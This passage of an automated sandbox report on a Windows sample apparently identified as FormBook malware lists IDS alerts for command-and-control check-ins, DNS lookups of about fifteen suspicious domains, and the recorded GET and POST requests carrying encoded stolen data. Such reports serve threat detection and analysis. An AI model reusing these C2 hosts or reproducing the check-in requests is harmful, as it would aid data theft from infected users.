Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50003 -> 192.186.58.31:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 104.21.64.1:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50022 -> 136.243.64.147:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50022 -> 136.243.64.147:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50026 -> 172.67.148.216:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50026 -> 172.67.148.216:80
                Source: DNS query: www.laduta.xyz
                Source: DNS query: www.explorevision.xyz
Source: Joe Sandbox View, IP Address: 47.83.1.90
Source: Joe Sandbox View, IP Address: 76.223.67.189
Source: Joe Sandbox View, ASN Name: VODANETInternationalIP-BackboneofVodafoneDE
Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (15 occurrences)
                Source: C:\Users\user\Desktop\1162-201.exe, Code function: 0_2_00C9CE44 InternetReadFile,SetEvent,GetLastError,SetEvent, 0_2_00C9CE44
                Source: global trafficHTTP traffic detected: GET /ca6n/?-0-L9xY=0h9Wf4Uk+EHtRoE9GYslXHc8OAVXToPYP42Hdey84aKhqV9wbfXJif0/+OnZ2BVp9cN120ZusPNi0A+xg/3t9NEZmf+IGJW1PRZ6E2m6SBA4aflrt404XQhuINrHqXgvx4ee6EU=&Mn=PdO8wZnxGnZX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.kx22368.shopConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /d89m/?-0-L9xY=wOJtjxBUJG0NHp56IJ7sd/1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F/TSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws=&Mn=PdO8wZnxGnZX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.laduta.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /pgw3/?Mn=PdO8wZnxGnZX&-0-L9xY=giVj5h0GrIkb2nAntMgQgIHhz9vsvZP6QDamwOszT0WhTX9+0mDl7NHSkZ+hOyPxCf2Vu3CaIskW8RrY03yQo2eiaMWSi+vSOZimmmNTE2YBudIqT+28rai5l9Ujnr5BEbYzzwU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.einpisalpace.shopConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /hf4a/?-0-L9xY=1xLyW3NuagjZMWLakpM9q9Dlq5M4Mwlw3Xlkp07XGkfoNpNQ7ONbaOfooFbWkXkUauDqyi9rr3xWBLUVS1AbncpoQpr6kYxUu+wU3Tx1ZPQnZRQ2cE7e7gBiti52HSebvZ5SsDs=&Mn=PdO8wZnxGnZX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.ripbgs.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /t0rn/?Mn=PdO8wZnxGnZX&-0-L9xY=Yd+jCUH61c4a7Q1+Dkx6pQX3S61LKXAtFbIeY4NO2NPuq2cKreHL8mdEdFCyOqVBfEq7A2gNsBXq87HwyvEMJSNDnPhs3w+B9xX6N7MrbCFYPNclLBgQ9fjNZkREdMjUbQytONk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.explorevision.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /wn9b/?-0-L9xY=vboslbB2+fPQbuQgZEku0U8Mit34kv6hkjEO/9jYS6JieTwBpMMlA1+GJuZnlONOskCea7euAeJ8nc5JKxSpmkXrUEu+S/eo/p+L/n9ML9zYgduzowjOe25j+nYWtjJhKH1IZis=&Mn=PdO8wZnxGnZX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.babyzhibo.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /utww/?-0-L9xY=tlTwcU9ZWjUkkDOfL8m8hKdUQz2PcyBI6lKxmlk4uDhIu7zh7TbGiDYhoS5CKbA93kURRma0w2BXBhIfz9bvypQbFpT5jG8x4isXk855maVsJaNYXMtMyHgYaLu1BwVeMhPbSn8=&Mn=PdO8wZnxGnZX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.mzkd6gp5.topConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /s1ai/?Mn=PdO8wZnxGnZX&-0-L9xY=OeuCC4AAQS2w6DeZmykOBUICy+Ibjx9D3RgTSDmLGyfpyTmRf/Og24qPiqLVP2x5Sr9ji300Ieqror0vpzcssLhcoQBQDTaflTjWEmv0cWcvwj5EA3qCrdMAiiyroqZ2qSN6N28= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.infovea.techConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /h4q2/?-0-L9xY=O7WWq9F6w4cGi/1xuyqA6hNbNZ9TTDUhOaeE1BmWFQlzRYYNMfDiNCsBOldRtXetUX45l8haztomC58f/ZN8Kn/la1SkzkcShgzFC6zVssbmmh1rF7ne1GqBaj3+VQkehMq71iQ=&Mn=PdO8wZnxGnZX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.itcomp.storeConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /oqj2/?Mn=PdO8wZnxGnZX&-0-L9xY=tgXYdkLIQp5X1DQK2Lc0zTS8fsB8z/iBngGKB1idJuR6ndicPlBASrfeljqr7NFo/3ruzmmh7usSa3Ts+9UehuGvsJDxVXRAIIPhWP6NCAav+HV8QwX1dk0t+FHMIvusdCtCdZ0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.100millionjobs.africaConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /ufm5/?Mn=PdO8wZnxGnZX&-0-L9xY=oc2Ugo7X/DVLb3HoIsa141WPD8DQYVLt5ibtMrinrDozD5x17UU4sfIyzVFZWMP4gpVNgjcaO4w3lUPdIZ87CNE5Lom3+E6tX7ctr5EfQpvE80XMoDlosFwsnFO5slPeaFGzRec= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.overlayoasis.questConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global traffic, DNS traffic detected: DNS query: www.kx22368.shop
                Source: global traffic, DNS traffic detected: DNS query: www.laduta.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.einpisalpace.shop
                Source: global traffic, DNS traffic detected: DNS query: www.ripbgs.info
                Source: global traffic, DNS traffic detected: DNS query: www.0303588a47.buzz
                Source: global traffic, DNS traffic detected: DNS query: www.tizzles.tech
                Source: global traffic, DNS traffic detected: DNS query: www.explorevision.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.babyzhibo.net
                Source: global traffic, DNS traffic detected: DNS query: www.mzkd6gp5.top
                Source: global traffic, DNS traffic detected: DNS query: www.potorooqr.lol
                Source: global traffic, DNS traffic detected: DNS query: www.infovea.tech
                Source: global traffic, DNS traffic detected: DNS query: www.itcomp.store
                Source: global traffic, DNS traffic detected: DNS query: www.100millionjobs.africa
                Source: global traffic, DNS traffic detected: DNS query: www.glyttera.shop
                Source: global traffic, DNS traffic detected: DNS query: www.overlayoasis.quest
                Source: unknownHTTP traffic detected: POST /d89m/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.laduta.xyzOrigin: http://www.laduta.xyzReferer: http://www.laduta.xyz/d89m/Cache-Control: no-cacheContent-Length: 212Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30Data Raw: 2d 30 2d 4c 39 78 59 3d 39 4d 68 4e 67 45 52 67 66 48 52 43 47 4c 70 76 43 61 69 36 56 70 41 76 33 50 58 63 61 63 45 7a 31 54 56 4d 2b 4c 41 49 31 49 66 2f 63 6c 46 70 65 49 71 77 62 5a 5a 2b 38 36 4b 30 76 70 49 70 50 67 65 31 6a 73 39 46 42 6f 6c 79 32 6f 51 46 30 6a 75 59 4c 62 6a 4f 72 79 54 36 77 73 39 33 43 59 51 76 37 55 76 59 50 51 38 56 4a 57 6c 63 41 49 49 6f 74 6c 36 4d 59 57 4c 36 4e 4e 6e 52 36 42 37 4d 2b 6e 56 55 70 30 39 55 6c 70 48 4d 62 58 45 73 71 64 42 31 5a 52 4e 33 62 6b 52 33 67 7a 6e 34 77 59 61 78 58 4b 38 34 75 66 68 5a 5a 37 50 4b 70 6a 4f 62 39 56 49 4a 75 6b 6d 66 61 44 35 6c 75 31 49 32 6b 6e 6f 34 Data Ascii: -0-L9xY=9MhNgERgfHRCGLpvCai6VpAv3PXcacEz1TVM+LAI1If/clFpeIqwbZZ+86K0vpIpPge1js9FBoly2oQF0juYLbjOryT6ws93CYQv7UvYPQ8VJWlcAIIotl6MYWL6NNnR6B7M+nVUp09UlpHMbXEsqdB1ZRN3bkR3gzn4wYaxXK84ufhZZ7PKpjOb9VIJukmfaD5lu1I2kno4
                Source: global traffic, HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Fri, 10 Jan 2025 08:11:26 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L70RIiBmOYfKGjaYeipFVbIyeXCyhl779EQGsO0G9bSmUGHUZDh29N%2B%2BHvBInc%2FjkLxZohVOuZDcG4lOOjnZuit0oaiVPh9hWeBtF4cxOfsYeQSY6vrgD1yV7skN%2FRGEWDD4%2B9miRAo%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8ffb323efcdb4321-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1546&min_rtt=1546&rtt_var=773&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic, HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Fri, 10 Jan 2025 08:11:29 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJ7hrss%2Byexp%2F9EiCU0U0gYQ9GK24OY0%2BT12nZrkiH3Pi8ciGA%2BBYiE7t0lucV1JPKFAwL8qjyTAnDs37DA1TsvfDhcuZ%2ByWTFyKuo7cK7c65OMGzgW7dVz%2BF%2FXk9pwbACWHZzX5w8k%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8ffb324eeb0242c9-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1662&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=814&delivery_rate=0&cwnd=125&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic, HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Fri, 10 Jan 2025 08:11:31 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=65oyZ4DP%2BC0JwGm3OPngz5mLyZxKGMdEViDQA%2FFgTe2qEW7ZtlLBaYPqZct0PZYea3WmCjQxMf7UVgKPeqFhVGMcxcCUKdGZVRH1m9uazUNIqQoITAkKkfIkHX%2BVv5E%2BSE67eLwsj8E%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8ffb325ecd3c8c30-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2019&rtt_var=1009&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1827&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic, HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Fri, 10 Jan 2025 08:11:34 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v2dPqzR%2Fzpay%2BDAh0BItakTeQ8UGqi0Riu2ePbol0IB55lUBW%2FkdOdbgs%2FZDJS57O9%2FMlvINr%2FTv6P5sQjRwFBTuJAn33DBVS%2FljzLri96qesvFbh8tY7DP7ZM0cvj3YX%2FJgFH9MXV4%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8ffb326ece0541cd-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1703&rtt_var=851&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=524&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Ascii: 592<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type
                Source: global traffic, HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Fri, 10 Jan 2025 08:12:11 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic, HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Fri, 10 Jan 2025 08:12:14 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic, HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Fri, 10 Jan 2025 08:12:16 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic, HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Fri, 10 Jan 2025 08:12:19 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic, HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Fri, 10 Jan 2025 08:12:40 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2BkyB%2BECMl8AWZ6kVIFeZyjbCdF4ukGG6UKffVeZoKVwPDqz1y9pybc0iKI0P1WeopKgaThvfjkP0nKKXKWasXm1u06GXD%2B3PachlS4VmeIR8Ew76e4JIG0zzVp0RiLyGTzY"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8ffb340e7f754414-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1598&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=775&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic, HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Fri, 10 Jan 2025 08:12:43 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B8dOeIYWYRPqMd47IT8Z1o6QnbCukbPxs%2BQHGV7mHH0bdyKFeufT6ypuFc3fpPPQA4gW10RuSaN7c%2Bti9KbZpicDVLwvqHeGmA6lTVBQtDFvoNnQydf4%2F87Zi4%2BeOWVcjnu0"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8ffb341e489042e9-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1687&rtt_var=843&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic, HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Fri, 10 Jan 2025 08:12:45 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DJDDB%2F2M9nEZ7cYFHW6mKb58ePa3bHBQj9SsEqrBXF8ufupJyX0aE6SnKnWj5gpW28FwvFrxtuAnThEc%2BBe0tniA4fnTXY4e%2FQkkukKd9UWcRdrQ62aziAG%2Bq9E%2FgR9%2F%2Bhsv"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8ffb342e5b14c358-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1597&rtt_var=798&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1812&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic, HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Fri, 10 Jan 2025 08:12:48 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fg%2Foqeh5PKJsRIbWbtuaHM5dHL9iQvDdgTx9fr5WM8AzcZhuNevVt8I%2FdajrOaxy44AXjoCw67pcZ%2FgAmCxJjR1wuhDl4hDeLelnBJakTyeEU8KwS%2BMXW8ptPJ0PV0YX%2FfwR"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8ffb343e3d3f42e9-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1680&rtt_var=840&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=519&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frien
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:13:23 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:13:26 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
